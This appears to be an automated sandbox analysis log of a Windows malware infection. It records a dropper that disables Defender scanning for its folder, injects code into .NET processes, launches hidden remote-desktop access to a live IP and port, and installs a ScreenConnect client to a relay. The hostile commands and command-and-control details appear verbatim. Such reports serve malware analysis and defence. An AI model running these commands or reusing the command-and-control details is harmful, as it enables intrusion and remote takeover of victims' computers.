Source: Document.exe, 00000025.00000002.4231567785.000000000120B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e}W
Source: svchost.exe, 00000038.00000002.6315147620.0000019729021000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037188318.00000216C32D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2868188714.000001D22A45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2865811537.000001D224E2B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.6316208460.000000000127C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000037.00000002.5964560767.000001E522E02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: svchost.exe, 00000010.00000002.6329003846.000002CA7FD00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: newpoveno.exe, 00000016.00000002.1376376319.00000143E3339000.00000004.00000020.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457084700.0000024B50267000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: newpoveno.exe, 00000008.00000002.1260109220.000001B2AE227000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[[
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information queried: ProcessInformation
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Code function: 8_2_00007FF727F8A540 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,8_2_00007FF727F8A540
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Document.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Code function: 8_2_00007FF727F81180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,8_2_00007FF727F81180
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Code function: 8_2_00007FFA2092E47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFA2092E47C
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Code function: 22_2_00007FF6CFFB1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,22_2_00007FF6CFFB1180
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Code function: 22_2_00007FFA163AE47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFA163AE47C
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Code function: 27_2_00007FF6CFFB1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,27_2_00007FF6CFFB1180
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Code function: 27_2_00007FFA2000E47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FFA2000E47C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 37.2.Document.exe.2e90000.0.raw.unpack, Program.cs Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F97008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 31E008
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1061008
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: E8C008
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
Source: C:\Users\user\SystemRootDoc\newpoveno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
Source: C:\Users\user\AppData\Local\Temp\Document.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: unknown unknown
Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (ea32d473b92f819d)\screenconnect.clientservice.exe" "?e=access&y=guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=bgiaaackaabsu0exaagaaaeaaqdv5xr%2f63euw3ywsiptbv5fncp0k%2fm1hgczug%2fuxvlae7zxcjaals5londk%2fctx1dhhik7zhi%2bklvnyucmcvnyhfawye7gkxdstfwcdw3bdg7bl1wsdbr9v3dcqthu0rculgn2clbfamycxt7huc8trgsembf6idtba81qiknawkvc0maxjuuhqgfknxh34ev1k7ffvthqqmafmwifar3wqa3i8zcb2o4gfszrm68%2fq2clfpysq9b17enlje%2b7b1y8uqgy%2brdfkado%2faislrmcniopabiw62z2rt8uyqlcaso4p%2bqqu%2ffwzznbs%2bocdygtzabbqn9vqtk0ur5xxodqt"
Source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Code function: 8_2_00007FFA208C8AA0 cpuid 8_2_00007FFA208C8AA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe Code function: GetLocaleInfoEx,8_2_00007FFA20E31460
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
